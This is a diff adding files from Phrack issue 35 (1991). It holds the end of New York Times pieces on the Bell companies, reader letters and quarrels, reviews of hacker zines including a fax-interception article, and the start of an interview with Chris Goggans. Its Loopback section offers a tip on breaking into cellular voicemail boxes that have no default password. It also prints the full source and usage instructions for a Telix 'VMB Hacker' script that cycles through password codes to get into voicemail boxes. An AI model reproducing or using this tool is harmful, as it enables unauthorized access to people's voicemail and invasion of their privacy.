+     The best protection against Big Brother is to separate control of the
+pipeline from the information.  That could be easily enforced by requiring that
+pipeline owners, like the Baby Bells, serve only as common carriers and lease
+pipeline space to information providers on a non-discriminatory basis.
+
+     Common carrier status is what the FCC proposal would achieve for video
+services but what the appeals court decision would foreclose for information
+services.
+
+     Congress seems unwilling to impose common carrier status. But Rep. Jim
+Cooper, D-Tenn., offers a second-best remedy.  As long as the Baby Bells retain
+monopoly control over local phone service, he would allow each to sell
+information only outside its own region.  His bill also offers stringent
+safeguards against anti-competitive behavior.
+   
+     Yet the bill's provisions aren't as safe as common carrier status.  The
+Baby Bells have frequently violated regulations; rules alone are unlikely to
+stop them from subsidizing forays into information services with funds
+extracted from captive rate-payers.
+
+     Contrary to their claims, the Baby Bells have no special abilities to
+provide electronic services.  If they could sell video shopping for a profit,
+so could hundreds of other companies -- not one of which has the power to
+intimidate ratepayers because not one has privileged access to their homes.
+
+     Nor, as the Baby Bells claim, do they need to produce their own
+information services in order to fill capacity on fiber-optic cables they might
+lay.
+
+     The strongest argument the Baby Bells offer is technological.  Only a
+single company, they contend, will be able to marry pipeline and information.
+But there's no proof of this speculation and besides, there are better ways to
+manage the problem.
+
+     The Cooper bill provides plausible protection against monopolistic Baby
+Bells, giving them ample room to compete but limited room to exploit.
+
+     Newspapers, including The New York Times Co., support the bill for
+competitive commercial reasons. But there is a much more important reason for
+the public to favor, and Congress to adopt, the Cooper bill: to protect the
+free, diverse flow of information on which democracy depends.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Don't Baby the Bells                                          November 10, 1991
+~~~~~~~~~~~~~~~~~~~
+>From The New York Times
+
+     Although the Bell companies are opposed by numerous groups, including the
+Consumer Federation of America, the cable television industry and existing
+providers of electronic information services, it is the newspapers that are its
+biggest opponents.
+
+     The publishers argue that the telephone companies can compete unfairly by
+subsidizing their services with money from their regulated telephone businesses
+and by imposing technical obstacles to competing information suppliers.
+
+     But one of their biggest fears is simply that the telephone companies
+could attract a large proportion of the classified advertising, a mainstay for
+newspapers, by offering cheap and easy-to-use electronic bulletin boards.
+
+     The newspapers are pushing Congress to adopt a bill introduced by
+Representative Jim Cooper, Democrat of Tennessee, which would not allow a Bell
+company to offer information services unless those services are already
+available to at least 50 percent of the people in the area over an alternative
+network.
+
+     As a practical matter, the bill would reinstate the information-service
+ban for all Bell companies for years, because of the difficulty in building an
+alternative network that reaches most customers.
+
+     To defend their position as more than a simple bid to keep out
+competition, the newspaper association has crafted a blunt advertising campaign
+around the slogan "Don't Baby the Bells."
+
+     In one ad, the association warns that the telephone companies could amass
+as much private information on customers as the Internal Revenue Service.
+
+     But while many members of Congress are worried about giving new powers to
+the Bell companies, the Cooper bill has thus far attracted only 24 sponsors,
+and most experts doubt the bill can muster enough support to pass even the
+House.
+
+     Meanwhile, the Bush administration strongly favors lifting the prohibition
+on information services and would probably move to veto a bill that kept it in
+place.  The upshot is that newspaper publishers are in a difficult position.
+
+     A stalemate in Congress amounts to a complete victory for the Bell
+companies, because court decisions have already given them precisely what they
+want.
+
+     In Congress, however, aides to leading lawmakers say they are waiting in
+part to see how much popular and political strength each side can muster.  "We
+want them to show us what they can bring," one staff member said about the
+publishers.
+
+     One lobbyist allied with the publishers said opponents of the Bell
+companies were essentially trying to build up a bargaining position. "You could
+see this as the beginning of a minuet," he said.  "The question is whether they
+will ever get into the middle of the floor and dance."
+_______________________________________________________________________________
+
diff --git a/phrack35/2.txt b/phrack35/2.txt
new file mode 100644
index 0000000..2363616
--- /dev/null
+++ b/phrack35/2.txt
@@ -0,0 +1,721 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-five, File 2 of 13
+
+                          [-=:< Phrack Loopback >:=-]
+
+                                By Phrack Staff
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about what ever topic you would like to discuss.  This is
+also the place The Phrack Staff will make suggestions to you by reviewing
+various items of note; magazines, software, catalogs, hardware, etc.
+______________________________________________________________________________
+
+What's on Your Mind
+~~~~~~~~~~~~~~~~~~
+
+:: Hacking VMB's ::
+
+From: Mr. Upsetter
+To: phracksub@stormking.com
+Subject: Phrack 34 VMB article
+
+The article in Phrack 34 on voice mail hacking by Night Ranger was really good.
+It reminded me of some experiences I had with a cellular voice mail system a
+couple years ago in San Diego.  I would bet there are similar systems in other
+cities.
+
+These VMB's would automatically answer calls when the subscriber wasn't on the
+air.  They worked just like standard VMB's.  To access the box, the owner could
+dial his or her own cellular number, then hit * when it answered.  Then the VMB
+would ask for a password.
+
+Guess what the default password was?  None!  That meant all you had to do was
+dial up a cellular VMB and hit *, and you were in.  How many VMB's still had
+the default password?  About half...
+
+To scan for cellular VMB's all you had to do was dial numbers in the cellular
+prefix.  It was pretty fun...almost too easy.
+
+Cheers,
+Mr. Upsetter
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+>From: Zoso Puda
+>
+>After reading PHRACK 34 I thought it was good. Especially the article on VMB
+>hacking. As a matter of fact I wrote a SALT script to help me do it.
+
+     This is exactly what we like to see.  People actually getting basic
+information and building on it.
+
+-  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -
+
+                    +-------------------------------------+
+                    |      ZoSoft Telix VMB Hacker        |
+                    |                                     |
+                    |       written by: Zoso Puda         |
+                    +-------------------------------------+
+First words
+-----------
+   After reading Night Ranger's article (see PHRACK 34), I decided to make a
+VMB hacking program. Night Ranger provided good insight into how to hack VMB
+systems but some VMBs are hard to crack. What I came up with is a program to
+help me hack some of the harder systems. The ones that don't use the defaults
+are tough. Also my phone has the buttons and earpiece in one unit and I had to
+dial then put the phone to my ear and listen, look at the buttons to dial a
+number and put the phone back to my ear to listen. It soon became tiresome.
+
+   What I finally came up with was a program to let me run all the phone
+functions from the keyboard. My modem speaker is loud enough to hear clearly so
+it seemed like the perfect thing to do. I also automated certain features like
+incrementing the password or box number. The program is not fully automated
+however. You must run this program manually. It's main purpose is to allow you
+to run normal phone functions via the keyboard. If you cannot hear clearly
+through your modem speaker then pick up the phone after the program dials the
+VMB phone # and hang up the phone before hanging up the modem.
+
+   What follows is a brief description on how to use the program, compile the
+program, and run the program. A working knowledge of VMB systems is expected.
+
+Parameter details
+-----------------
+  VMB phone number : If you don't know this, give it up.
+
+  Setup sequence : This code is used for systems that require a '9' or '#' or
+                   '*' to be pressed before the box number. Up to 3 characters
+                   can be in this string.
+
+  Valid Box #      : This would be a known valid box or the box you will
+                     be attempting to hack. This value remains constant.
+
+  Codefile filename: You may use a file to get 'default' or your favorite
+                     passwords from. You must include the extension.
+
+  Starting box/code: Box # or code to start checking. This value will
+                     increase automatically upon pressing [F7].
+
+Using the function keys
+-----------------------
+                [F1]    Dials the VMB system (see params).
+                [F2]    Hangs-up the modem.
+                [F3]    Closes the current codefile.(see params).
+                [F4]    Lets you set the current code/box #.
+                [F5]    Dials the Setup sequence (see params).
+                [F6]    Dials the current code.
+                [F7]    Makes the next code current.
+                [F8]    Dials the valid box (see params).
+                [F9]    Allows you to re-set the parameters.
+                [F10]   Hangs-up and quits the program.
+                [0 - 9] These keys will dial 0 - 9 respectively.
+                [*, #]  These keys will dial * and #.
+                [/]     Used as a substitute # for the keypad.
+
+Basic Insructions
+-----------------
+Codefiles should be stored in the same directory as your Telix program.
+
+A sample codefile should look like this:
+
+1111
+2222
+3333
+etc...
+
+I suggest you make seperate codefiles for the number of digits in each code.
+For example, all 3 digit codes should be in a file called 3DIGIT.COD, or
+something similar.
+
+During parameter entry, if you enter a codefile and it exists, you will NOT
+be prompted for a 'Starting box/code'. When the codefile is finished, the
+current code will set itself to 1000.
+
+If you enter a blank for the codefile or the name you entered doesn't exist
+then you will be prompted for a 'Starting Box/Code'.
+
+Compiling
+---------
+ Save the program within the 'CUT HERE' lines as VMBHACK.SLT. Copy the file
+ VMBHACK.SLT into the directory where your Telix scripts are. Compile using
+ CS.EXE. (example: CS VMBHACK.SLT) To run the program, load Telix and press
+ Alt-G followed by the program name (VMBHACK).
+
+//---------------------------<CUT HERE>-------------------------------------
+//                   ZoSoft VMB Hacker Version 1.4
+//                    Code by: Zoso, November 1991
+//
+//           See PHRACK 34 for more information on VMB systems.
+//
+// NOTE: Do not remove the credits of the original author, modified versions
+//       you may add credits, but please do not remove any.
+//
+str code[10],                           // Global Variables
+    codes[10],
+    reset[1],
+    vmb_number[15],
+    borc[1],
+    valid[10],
+    setup[3];
+str filename[12],
+    fstatus[10];
+int f;
+int fflag = 0;
+init_modem()                            // Modem initialization
+{
+cputs("AT X3 S6=0 S7=0 S11=105 M1 L3"); // X must be 3, L is Loudness on
+cputs("^M");                            // some modems, you may have to
+waitfor("OK",20);                       // alter this. See you modem
+manual.
+}
+vmb_dial(str string)                    // Dial function
+{
+str workstr[20];
+workstr = string;
+strcat(workstr,";");
+cputs("ATDT");
+cputs(workstr);
+cputs("^M");
+cputs("^M");
+}
+hang_up()                               // Hang Up function
+{
+hangup();
+waitfor("",20);
+cputs("ATH0");
+cputs("^M");
+cputs("^M");
+clear_scr();
+display();
+}
+next_code()                             // Next code function
+{
+int cd;
+if (fflag)
+   {
+    if (not feof(f))                    // Check for file first
+       {
+        fgets(code,10,f);
+        return;
+       }
+    if (feof(f))
+       {
+        file_close();
+        code = "999";
+        goto NEXTCODE;
+       }
+   }
+NEXTCODE:
+cd = stoi(code);
+cd = cd + 1;                            // This line determines how the
+code
+itos(cd,code);                          // gets incremented.
+}
+set_code()                              // Enter new code
+{
+gotoxy(65,2);
+gets(code,10);
+}
+parameters()                            // Set parameters
+{
+str c[1];
+file_close();
+GETINFO:
+clear_scr();
+printsc("VMB Hacker Parameters^M^J");
+printsc("^M^JVMB phone number    :");
+gets(vmb_number,15);
+printsc("^M^JSetup sequence      :");
+gets(setup,3);
+printsc("^M^JValid box #         :");
+gets(valid,10);
+printsc("^M^JCodefile filename   :");
+gets(filename,12);
+if (filename != "")
+   {
+    open_file();
+    next_code();
+   }
+if (not fflag)
+   {
+    filename = "N/A";
+    printsc("^M^JStarting box/code   :");
+    gets(code,10);
+   }
+printsc("^M^J^M^JCorrect? (Y/n):");
+gets(c,1);
+if (c == "n" || c == "N")
+    goto GETINFO;
+}
+press_enter()                           // Pause routine
+{
+str a[1];
+pstraxy("Press [ENTER] to continue...",20,23,11);
+gets(a,1);
+}
+title_scr()                             // Title screen
+{
+str i[1];
+TITLE:
+clear_scr();
+pstraxy("  - ZoSoft VMB Hacker V1.4 -",20,4,11);
+pstraxy("written for Telix by: Zoso Puda",20,6,14);
+press_enter();
+}
+display()                               // Display screen
+{
+box(0,0,78,3,4,0,19); box(0,0,78,5,4,0,19);
+pstraxy("[ ZoSoft VMB Hacker V1.4 ]",25,0,31);
+pstraxy("VMB Number:",4,2,31);          // Information display
+pstraxy(vmb_number,16,2,27);
+pstraxy("Valid #:",33,2,31);
+pstraxy(valid,42,2,27);
+pstraxy("Current:",57,2,31);
+pstraxy(code,66,2,27);
+pstraxy("Codefile:",6,4,31);
+pstraxy(filename,16,4,27);
+pstraxy("File status:",29,4,31);
+pstraxy(fstatus,42,4,27);
+pstraxy("Setup sequence:",50,4,31);
+pstraxy(setup,66,4,27);
+box(0,6,78,10,4,0,103);                 // Function key display
+pstraxy("[           ]",30,6,111);
+pstraxy(" 0 - 9,*,#",31,6,110);
+pstraxy("[  ] Dial VMB", 2,7,111);
+pstraxy("F1", 3,7,110);
+pstraxy("[  ] Hang up",22,7,111);
+pstraxy("F2",23,7,110);
+pstraxy("[  ] Close file",42,7,111);
+pstraxy("F3",43,7,110);
+pstraxy("[  ] Set Current",61,7,111);
+pstraxy("F4",62,7,110);
+pstraxy("[  ] Setup seq.",2,8,111);
+pstraxy("F5", 3,8,110);
+pstraxy("[  ] Dial current",22,8,111);
+pstraxy("F6",23,8,110);
+pstraxy("[  ] Next box/code",42,8,111);
+pstraxy("F7",43,8,110);
+pstraxy("[  ] Valid box",61,8,111);
+pstraxy("F8",62,8,110);
+pstraxy("[  ] Parameters",22,9,111);
+pstraxy("F9",23,9,110);
+pstraxy("[   ] QUIT",41,9,111);
+pstraxy("F10",42,9,110);
+gotoxy(0,11);
+}
+quit_vmb()                              // End program
+{
+file_close();
+hangup();
+waitfor("",20);
+clear_scr();
+printsc("Thanks for using ZoSoft's VMB Hacker.^M^J^M^J");
+cputs_tr(_mdm_init_str);                // Restore modem params
+}
+open_file()                             // Open Codefile
+{
+fflag = 1;
+f = fopen(filename,"r");
+fstatus = "OPEN";
+if (ferror(f))
+    file_close();
+}
+file_close()                            // Close Codefile
+{
+fflag = 0;
+fclose(f);
+fstatus = "CLOSED";
+}
+main()                                  // MAIN program module
+{
+int chr;
+title_scr();
+parameters();
+clear_scr();
+display();
+init_modem();
+TOP:
+gotoxy(0,11);
+chr = inkeyw();
+if (chr == '0')    vmb_dial("0");       // Dial 0-9
+if (chr == '1')    vmb_dial("1");
+if (chr == '2')    vmb_dial("2");
+if (chr == '3')    vmb_dial("3");
+if (chr == '4')    vmb_dial("4");
+if (chr == '5')    vmb_dial("5");
+if (chr == '6')    vmb_dial("6");
+if (chr == '7')    vmb_dial("7");
+if (chr == '8')    vmb_dial("8");
+if (chr == '9')    vmb_dial("9");
+if (chr == '#')    vmb_dial("#");       // Pound sign (#)
+if (chr == '/')    vmb_dial("#");       // Make (/) same as (#) for keypad
+if (chr == '*')    vmb_dial("*");       // Asterisk (*)
+if (chr == 15104)                       // F1
+    vmb_dial(vmb_number);
+if (chr == 15360)                       // F2
+    hang_up();
+if (chr == 15616)                       // F3
+   {
+    file_close();
+    display();
+   }
+if (chr == 15872)                       // F4
+   {
+    set_code();
+    display();
+   }
+if (chr == 16128)                       // F5
+    vmb_dial(setup);
+if (chr == 16384)                       // F6
+    vmb_dial(code);
+if (chr == 16640)                       // F7
+   {
+    next_code();
+    display();
+   }
+if (chr == 16896)                       // F8
+    vmb_dial(valid);
+if (chr == 17152)                       // F9
+   {
+    hang_up();
+    parameters();
+    display();
+   }
+if (chr == 17408)                       // F10
+   {
+    quit_vmb();
+    goto END;
+   }
+goto TOP;
+END:
+prints("^M^J");
+}
+//---------------------------<CUT HERE>---------------------
+
+______________________________________________________________________________
+
+:: More Legal Stuff ::
+
+>From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
+>Subject: RE: Who/What is this?
+>
+>In this country, the receipt of documents like this would probably be
+>pretty helpful in sending a person down on a conspiracy to contravene
+>a section or more of the Computer Misuse Act, I do not appreciate crap
+>like this appearing on my machine but since you didn't send it me, I
+>can't really moan at you - What I would appreciate though is if you
+>told people that forwarding it to people who don't want it is probably
+>not a good idea, unless you want all your list members locked up in
+>some pokey British gaol that is!
+>
+>Michael Lawrie.
+>---
+>Michael Lawrie, Hicom Group Security           <security@uk.ac.lut.hicom>
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Sir,
+     You will have to excuse my ignorance of telecom laws in other countries.
+In the United States, distribution of technical information such as Phrack Inc.
+is protected by law.
+
+     Hackers are not involved in conspiracies or plots.  Most hackers could
+care less about politics.  Hackers are interested in the progression of
+technology and learning about how our advanced society works.  The inefficient
+structure known as government is the last thing most hackers are interested in
+exploring.
+
+     Phrack Inc. has no "membership."  Phrack Inc. is an electronically
+distributed publication.  It is like any other security oriented newsletter.
+Have you ever heard of "Computer Security Journal", "Computers and Security",
+or "Computer Crime Digest?"  These are some of the "security industry"
+publications that are read in the U.S.  Phrack Inc. merely has a little
+different flavor to it.  If you are interested in seeing any of these printed
+journals, I can forward their address to you.
+
+     I am sorry if you received Phrack Inc. and didn't wish to read it.  You
+might wish to take the matter up with the person that forwarded it to you.  I
+hope it wasn't too big of an inconvenience for you to delete the mail message
+containing Phrack Inc.
+
+Cheers,
+
+Dispater
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     After a (as it turns out not so private) conversation with Torq, it seems
+this guy isn't even an admin anywhere.  He just likes to pretend he is.  Did my
+reply end this little debate?  NOT!  This person had the nerve to intercept my
+private mail to Torq and then proceeded to bitch about it some more.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+>From MICHAEL@hicom.loughborough.ac.uk Sat Nov  9 09:45:53 1991
+Date: Fri, 8 Nov 91 13:19 GMT
+From: "Michael Lawrie, Operations" <MICHAEL@hicom.loughborough.ac.uk>
+To: PHRACKSUB <<@nsfnet-relay.ac.uk:PHRACKSUB@STORMKING.com>>
+Subject: The EFF.
+
+I found the following message the other day, whilst routing around, I am to
+assume you lied to me about taking him off the list but for now we'll forget
+that.
+
+> From phrack@gnu.ai.mit.edu Wed Oct 23 01:41:51 1991
+> Date: Wed, 23 Oct 91 01:41:47 -0400
+> From: phracksub@stormking.com
+> Message-Id: <::::::::::::::::::::::>       
+> To: torq@:::::::::::::::
+> Subject: Phrack
+>
+> This guy sounds like a total idiot. If he does kill your account or something
+> stupid, get a hold of the EFF.  They went to bat for someone who had their
+> account revoked because he/she had issues of Phrack on their directory.
+>
+> people should get a clue....
+>
+> Dispater
+> phracksub@stormking.com
+
+As you say, people should get a clue. Are you assuming that 'torq' is perhaps
+American and as such has his rights protected by constitution? He isn't, he is
+British and doesn't really as such have much going for him. If I want to kill
+his account I can do it at the bat of an eyelid, whilst him receiving 'Phrack'
+is not breaking any laws because it does not show intent, it would be breaking
+my machine's regulations if it came here. I would enjoy the EFF to come 'to
+bat' for Torq if I revoke his account for having issues of Phrack in his
+directory, Its a shame he hasn't. Does the EFF have any good lawyers in the UK
+that you know of?
+
+Regards...
+  Michael.
+
+---
+Michael Lawrie, Operations Group, Systems Development and Security.
+Mail: michael@uk.ac.lut.hicom                     (Span:19527::60478::lorry)
+[What pretentious signature?]                     (Inet: lorry@mit.edu)
+
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: Dispater
+To: MICHAEL@hicom.loughborough.ac.uk
+
+        I never said I would delete him from the distribution list.  I don't
+have to DO anything.  Who the hell are you pretending to be anyway?  You aren't
+the admin of MIT's gnu machine.
+
+>I found the following message the other day, whilst routing around, I am to
+>assume you lied to me about taking him off the list but for now we'll forget
+>that.
+
+        Really?  What the hell were you doing prowling though someone else's
+mail?  I assume you did it without Torq's permission.  I wonder if MIT would
+like to hear that some British hacker is rummaging around their machine?  Your
+"finding" of our private e-mail might place you in criminal violation of the
+Electronic Communications Privacy Act of 1986.  This is a federal law in the
+United States which protects the privacy of electronic communications.  Your
+interception of our communications has violated our privacy.  How would you
+like me to have a little chat with YOUR supervisor?
+
+       Why you care about what takes place on the MIT computer which is located
+here in the USA?  In this country freedom of speech is a right granted to all
+its citizens.  The previous publisher of Phrack had to go to Federal Court to
+prove it and he succeeded.  Phrack Inc. is 100% legal here and there is not one
+damn thing you can do about it!
+
+Dispater
+______________________________________________________________________________
+
+:: Hacker Philosophy ::
+
+From: The Dark Lord Sarik Malthus
+Organization: Underground Computing Foundation
+
+
+>         I'm curious...now, don't think I am trying to judge you, or your
+> actions, or anything...but I am wondering how you, in your mind, justify the
+> actions of hackers and the kind of information provided by your magazine?
+
+     I don't.  I think people spend too much time attempting to justify
+their "morality."  I don't play that guilt trip.  I only seek information.
+Information has no morality.  It is simple and pure, just like truth.
+
+     I do feel that with knowledge comes responsibility not to use it in a
+destructive way.  This is why I will not print "how to make bomb" files in
+Phrack Inc.  Explosives are made for one thing and it doesn't involve too
+much creativity.  People can get that type of stuff elsewhere.
+
+     I have never damaged any system or hurt any individual financially.
+Carding is unquestionable robbery.  If you know the person you are carding
+from, that is revenge and is a different category, as far as I am concerned,
+but it still doesn't make it right.  Besides, any poser with half a brain can
+pull a CBI.  That doesn't demonstrate much talent to me.  I admit I went
+through the c0deZ phase, but I moved onto better things.
+
+     I guess your basic question may boil down to, "Why hack?"  I see the
+internet and the telecom world in as the latest frontier to be explored.  If
+you look back at how this country started, you will see that it was explored
+by people who probably had a similar mentality to that of hackers.  We want
+to test ourselves.  We want to have a broad range of different experiences in
+our lives.  We are not content with ignorance of the unknown.  And, to some
+extent we are sick of our current society's norms.  With that in mind we
+leave the security of what is considered acceptable at times.
+
+     I guess I have a lot of different unpopular views....oh well.
+_______________________________________________________________________________
+
+A Review of:
+~~~~~~~~~~
+Full Disclosure #23 - a publication For Truth, Justice, and The American Way
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Full Disclosure                              Subscription Rates:
+P.O. Box 903-FD23                            U.S - 12 issues for $18.00
+Libertyville  IL  60048                            24 issues for $29.95
+                                             No Canadian orders, please!
+by:Twisted Pair
+
+
+     About a month ago I mailed in a coupon I got from friend in order to get a
+sample issue of Full Disclosure.  Within a week I received Issue #23.  It's got
+articles on fax interception, dumpster diving, computer security tips,
+surveillance tips, technical stuff, mail surveillance, etc.
+
+     The Fax Interception article was most interesting to me.  I've often
+wondered just how easy it could be to intercept faxes.  Its all explained in
+the article.  Here's some text from the article:
+
+|                       False Sense of Security:
+|
+|   With the widespread proliferation of fax machines came increased use.
+|   In general, a document transferred has been given the same sort of
+|   validity as one sent or received by the U.S. Mail.*  In general, such
+|   communications were originally secure.  Now that interception equipment is
+|   available, the
+|   sense of security has become false.
+
+*Note:  Just this month, the FCC has stopped accepting paperwork with faxed
+        signatures on them.  Their new policy states that they only accept
+        original signatures.
+
+     How could the average Phrack reader start intercepting faxes?  Use a
+standard fax machine hooked up to someone's line?  Naaah.  Wouldn't work.  The
+handshaking routine between the two corresponding fax machines would be screwed
+all to hell if you threw a third machine into the mix.  Full Disclosure claims
+to have successfully nabbed faxes with another method.  They've pointed out
+this assertion with a photo on their front page of a "fax".  It was supposedly
+intercepted from the FBI.  It shows a computer screen with an FBI "FAX" on it.
+It looks more like the photo was made with some cutting and pasting at the
+neighborhood PIP store.  Maybe they should have added the caption "Simulated
+Picture" to their front page.
+
+     They recommend using IBM PC fax boards to intercept faxes.  You'd need
+"sophisticated" software that would ignore the handshaking sequences between
+the two fax machines you're spying on.  The IBM would just save all the page
+information and ignore the protocol information transmitted.
+
+Back to the article....
+
+|   Cellular phone-based fax machines provide ripe opportunity for "hacker"
+|   intercepts, since the signal is available via low cost police scanners.*
+|   No physical connection to a common carrier network is necessary.  There is
+|   absolutely no risk of being detected.
+
+*Note:  That should read MODIFIED police scanners.  See any of the ads in
+        "Nuts & Volts" for a book on doing this.
+
+     Discussed in the article is something called Broadband Interception.
+Commercial fax interception equipment can be hooked up to monitor satellite
+link traffic.  One unit can decode up to 150 simultaneous fax transmissions
+from a 6,000 phone line satellite link.
+
+     Next, all the consequences of forged faxes are discussed.  People have
+become so reliant on fax technology that they incorrectly assume that anything
+that "comes over the fax" must be legitimate.  Forgers find faxing much simpler
+than trying to make a "real" document.  The trouble of altering postmarks and
+signatures is bypassed.  All they need now is scissors and tape to make any
+"legitimate-looking" document needed.  In their next issue, they further
+discuss fax interception and all the implications of sending sensitive info by
+fax.
+
+|                         Fax Intercept Suppliers
+|          (The sale and/or use of fax interception equipment may be
+|                  restricted by State and Federal law)
+|
+|   Burlex International, Box 6094, Silver Springs MD 20906 (301) 460-4444;
+|   Communications Devices,3510 Mountain Rd,Haymarket VA 22069 (703) 754-9316;
+|   El-Tec Intl, 205 Van Buren St #220, Herndon VA 22080 (703) 709-9673;
+|   [Many others listed]
+
+Oh, here's an ad from Full Disclosure.  It's a business card run:
+     ______________________________________________________
+|   |                                                      |
+|   | Unix Systems Specialists     Available July 10, 1992 |
+|   |                                                      |
+|   |               L  E  N       R  O  S  E               |
+|   |                                                      |
+|   |                  Convicted "Hacker"                  |
+|   |                         and                          |
+|   |                 Computer  Consultant                 |
+|   |              799 Royal St. Geore  #105               |
+|   |         Naperville, IL 60563  (708) 527-1293         |
+|   |______________________________________________________|
+
+     Since you might want to check out a copy of Full Disclosure for yourself,
+I'll include their address and stuff.  The issue I had was 16 pages long,
+half-newspaper size.
+______________________________________________________________________________
+
+
+A Review of TAP #105
+~~~~~~~~~~~~~~~~~~~
+TAP Magazine                                       Subscription Rates:
+PO Box 20264                                       10 issues for $10.00
+Louisville KY  40250-0264
+
+by Dispater
+
+     Around March of 1991 I mailed in my $10. for a subscription to TAP
+Magazine.  Promoted as "the oldest hacker magazine" and "created by Abbie
+Hoffman."  I still, to this day, have not received ONE issue for my money.
+
+     While attending CyberView '91, I met Predat0r and gave him $5.00 for a few
+back issues consisting of #97, #100 through issue #104.  I was later given a
+complimentary issue of #105.  After asking about #98 & #99, Predat0r said that
+he wasn't going to give those out because of some bullshit with Aristotle.
+Whatever...I still don't see why we couldn't see it.
+
+     Anyway, Issue #105 of TAP Magazine (June 1991) was nothing spectacular,
+but it wasn't bad either.  The issue was 18 pages long.  For those of you who
+have never seen it, TAP contains information on hacking and phreaking as well
+as some political commentary.  The articles are always diverse and interesting.
+
+     TAP #105 contained information about the DNA Box.  This is basically
+cellular phone phreaking.  It was very good and quite detailed.  There were
+also schematics of bugs and a flow chart explaining the incident initiation
+sequence of the E-911 system.  This issue of TAP was sprinkled with some neat
+advertisements and news clippings (as usual) and wrapped up with a file about
+Blue Boxing.  The price of $10.00 for 10 issues is worth it, but read on...
+
+     Last week I asked Predat0r what was going on with TAP magazine.  He told
+me that he had the material for the next three issues, but his copier or some
+other equipment was broken.  This is an excuse I have heard before.  Whether it
+is a valid excuse or not, only he knows.  Since issue #105 (June) there has
+been not one issue of TAP.  If you have ordered a subscription prior to July
+and not received anything, I highly suggest you write to Predat0r.
+
+     The material contained in TAP is good and very much worth the price.
+(Especially compared to 2600 Magazine) However, I find that the general
+management of TAP to be poor, at this time, and therefore I highly recommend
+that you NOT send your $10 to TAP Magazine.  Considering the amount of
+advertisements that we have all seen by TAP (in magazines such as Mondo 2000,
+2600, etc.) in the past year, there is no excuse for the non-existent service
+that has transpired.  Predat0r is a good sysop and needs to manage TAP as he
+does his BBS.  I do urge you to call BLITZKREIG BBS (502) 499-8933 : NUP:
+COLUMBIAN COKE.
+
+     I really don't like to be so critical, but I know some people I've talked
+to are feeling ripped off.  This is why I wrote this.  I truly hope that TAP
+can get out of this slump.
+_______________________________________________________________________________
diff --git a/phrack35/3.txt b/phrack35/3.txt
new file mode 100644
index 0000000..b9ce881
--- /dev/null
+++ b/phrack35/3.txt
@@ -0,0 +1,332 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-five, File 3 of 13
+
+                 -*[  P H R A C K  XXXV  P R O P H I L E  ]*-
+
+                             -=>[  Presents  ]<=-      
+
+                        Sincerely Yours, Chris Goggans
+                        -===--===--===--===--===--===-
+                             by S. Leonard Spitz
+                             Associate Publisher
+                          INFOSecurity Product News
+
+"A provocative interview with a former member of the "Legion of Doom" suggests
+that the ethics of hacking (or cracking) are often in the eye of the beholder."
+
+Malicious hackers, even though most operate undercover, are often notorious for
+the colorful pseudonyms they travel under.  Reformed hackers, however, prefer a
+low profile so as to shed their image of perceived criminality.  Kevin Mitnick,
+infamous for the DEC caper, is one of the foremost advocates of this strategy.
+
+Now comes Chris Goggans, trailing his former "Legion of Doom" moniker, Erik
+Bloodaxe, behind him, to try it his way.  Goggans insists that where once he
+may have bent the rules, he is now ready to give something back to society.
+And coming across with a high degree of sincerity, he affirms his intention to
+try.  Are he and his colleagues, wearing their newly acquired information
+security consultants hats, tilting at windmills, or does their embryonic,
+cracker-breaking start-up, Comsec Data Security Co., stand a fighting chance?
+We thought we would ask him.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ISPNews: I am going to ask several legitimate questions.  Please answer them
+          completely, truthfully, and honestly.
+
+Chris Goggans:  OK.
+
+
+JUDGEMENT BY THE MEDIA
+
+ISPNews: Would you react to Computerworld's July 29 piece, "Group Dupes
+          Security Experts," <also seen in Phrack World News issue 33, part 2
+          as part of the article called "Legion of Doom Goes Corporate> in
+          which members of your organization were accused of masquerading as
+          potential customers to obtain information, proposals, and prices from
+          other security consultants?
+
+     CG: We were all amazed that something like that would ever be printed
+          because, as we understand common business practices, we weren't doing
+          anything unusual.
+
+ISPNews:  Computerworld reported that the Legion of Doom was "one of the
+          nation's most notorious hacker groups, according to federal law
+          enforcers."  Can you respond to that?
+
+     CG: Notorious is a relative term.  There has always been a shroud of
+          mystery covering the Legion of Doom, because it was an organization
+          whose membership was private.  When you keep people in the dark about
+          the activities of something, there is always going to be the
+          perception that more is going on than there really is.
+
+ISPNews: Would you say then that the characterization of being notorious is
+          unfair?
+
+     CG: To some degree, yes.  There certainly was activity going on within
+          the group that could be considered illegal.  But most of this was
+          taking place when members of the group were all between the ages
+          of 14 and 17.  While I don't want to blame immaturity, that's
+          certainly a factor to be considered.
+
+          The Legion of Doom put out four <issues of an> on-line electronic
+          newsletter <called the Legion of Doom Technical Journals> composed
+          of different files relating to various types of computer systems
+          or netware.  They explained different operating systems or
+          outlined different procedures used by networks.  They were always
+          informative and explained how to use a computer.  We never said
+          "This is a computer and this is how to break into it."
+
+          Colorful names and words used to describe groups also add to
+          notoriety.  If we had been the "Legion of Flower Pickers," the
+          "Legion of Good Guys," or the "SuperFriends," there probably
+          wouldn't be this dark cloud hanging over the group.
+
+ISPNews:  Could you be charged with intent to provide information to others
+          which would make it easier to gain unauthorized access?
+
+     CG: I don't see how that could be a charge.  There's the first amendment.
+          I maintain that talking about something and encouraging or forcing
+          someone to do it are completely different.
+
+
+EARNING AN "A" IN INFOSECURITY
+
+ISPNews:  What attracted you to computer security?
+
+     CG: The same thing that would attract anybody to being a hacker.  For
+          half of my life I've been in front of a computer every day.
+          Sometimes from early in the morning until the wee hours of the night.
